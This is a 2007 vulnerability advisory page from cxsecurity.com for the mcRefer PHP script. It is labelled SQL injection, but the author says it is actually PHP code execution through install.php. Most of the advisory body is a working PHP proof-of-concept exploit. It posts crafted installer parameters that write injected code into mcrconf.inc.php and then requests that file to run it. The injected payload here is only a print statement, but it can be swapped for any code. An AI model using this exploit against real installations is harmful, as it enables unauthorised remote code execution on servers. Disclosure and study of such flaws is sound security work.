mcRefer SQL injection

2007.02.26
Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

This is not an SQL Injection. The script don't use any SQL database, please tell me where is the sql request =). However the install.php script can lead to php code execution (works regardless of php.ini settings). Proof of concept: ----- #!/usr/bin/php <?php # This file require the PhpSploit class. # If you want to use this class, the latest # version can be downloaded from acid-root.new.fr. # # Author: DarkFig # Mail: gmdarkfig (at) gmail (dot) com [email concealed] # require("phpsploitclass.php"); error_reporting(E_ALL ^ E_NOTICE); $url = ""; # http://<host><path> $cod = "print(poc)"; $xpl = new phpsploit(); $xpl->agent("Mozilla"); $xpl->cookiejar(1); $xpl->allowredirection(1); $xpl->post($url.'install','p=XD&verif=1&envoi=Entrer'); $xpl->post($url.'install.php',"bgcolor=%24wazup%7B%24hello%7B${cod}%7D%7 D&tablecolor=1&tdcolor=1&fontface=1&fontsize=1&fontcolor=1&nomsite=1&url =$url&email=me%40u.com&pass=XD&verif=1&submit=1"); $xpl->get($url.'mcrconf.inc.php'); print($xpl->getcontent());


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top